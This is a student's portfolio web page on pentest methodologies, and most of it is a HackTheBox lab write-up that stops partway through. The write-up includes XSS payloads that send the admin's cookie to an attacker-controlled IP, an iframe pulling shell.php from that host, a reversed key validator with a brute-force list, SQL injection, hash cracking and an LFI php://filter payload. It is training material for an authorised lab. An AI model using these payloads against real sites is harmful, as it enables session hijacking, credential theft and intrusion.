          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
           it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
           <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
          <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
           number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
           found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
          <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
